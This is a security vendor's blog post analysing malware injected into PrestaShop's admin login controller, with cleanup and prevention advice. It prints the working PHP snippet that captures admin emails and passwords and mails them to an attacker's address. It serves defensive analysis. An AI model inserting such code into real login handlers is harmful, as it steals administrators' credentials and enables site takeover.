911 Hack Removal

Prestashop Credential Stealing Malware [2021]

Updated on: January 14, 2021

Prestashop Credential Stealing Malware [2021]

As a growing e-commerce platform, Prestashop is a huge target for hackers who wish to steal information. Usually, the information that is targeted is credit card numbers, but recently, our researchers have discovered a new type of credential stealing malware that targets Prestashop sites and steals the site admin credentials. This could lead to the complete takeover of your website.

How the Prestashop Credential Stealing Malware Works

The Prestashop credential stealing malware as found injected into a file ./controllers/admin/AdminLoginController.php on Prestashop sites like this: 

public function processLogin()
       /* Check fields validity */
       $passwd = trim(Tools::getValue('passwd'));
       $email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

This code is used to pass server information to variables. Some of the passed variables include the usernames and passwords used to log into the Prestashop back-end. This collected information is occasionally sent to the hacker’s email address using the PHP mail() function.

The email that is sent has everything the attacker needs to log into the hacked Prestashop site. From there, they can gain access to the site. This gives them complete access of your website’s back-end interface. This means that they can change the content, install fake/infected modules or plugins, and do a whole lot more.

In some cases, victims of this hack began to receive bounce back emails – which is likely due to Google detecting the attack and disabling/reporting the accounts involved.

The attacker/hacking group who is running this malware infection campaign is believed to be named as bajatx / B4JAT4T.

How to Fix Your Site After a Prestashop Credential Stealing Malware Infection

1. Take a backup of your site before cleaning.

It’s advisable to take the website offline so that users don’t visit the infected pages while you’re cleaning it. Make sure to take a backup of all the core files and databases. It’s a good idea to take the backup in a compressed file format, like .zip.

2. Replace the core, plugin, and theme files.

You can replace the infected core files with the original versions of the same from reputable sources. After downloading the fresh and updated versions of these files & directories, you can delete the older ones. This is especially important in cleaning up Prestashop credential stealing malware, as malicious code has been found inside the core files. 

3. Clean any suspicious, recently modified files. 

You might find potentially infected files by looking at the ones which were recently modified. You can restore these files from a clean backup you have or from a trusted source. 

4. Run a malware scan.

Run a malware scan on your web server for malware and malicious files. You can use the ‘Virus Scanner’ tool in the cPanel provided by your web host, or get expert malware cleanup with the Astra Pro Plan, which blocks the attack and also the bots which try to download the stolen data. 

In addition to these steps, you may find this article on Prestashop security helpful.

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Website Protection before it is too late.

How to Prevent Further Attacks

After fixing your site, here are a few good security practices to follow which ensure that your website stays safe from Prestashop credential stealing malware:

  • Make sure you’re running the latest update of your software
  • Use trusted third-party payment processors
  • Perform regular malware scans/security audits
  • Invest in a firewall

The only sure-fire way to protect your website from hackers’ ever evolving methods is to invest in security. It is a great idea to invest in a website firewall, run frequent malware scans, and get regular security audits as that can give you a great idea of your website’s overall security. 

Tags: , ,


Sreenidhi is a tech enthusiast who enjoys writing about cybersecurity and data science. Her areas of interest include WordPress security, new malware, and recent cybersecurity news.
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Inline Feedbacks
View all comments

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include a vulnerability scanner, firewall, malware scanner and pentests to protect your site from the evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany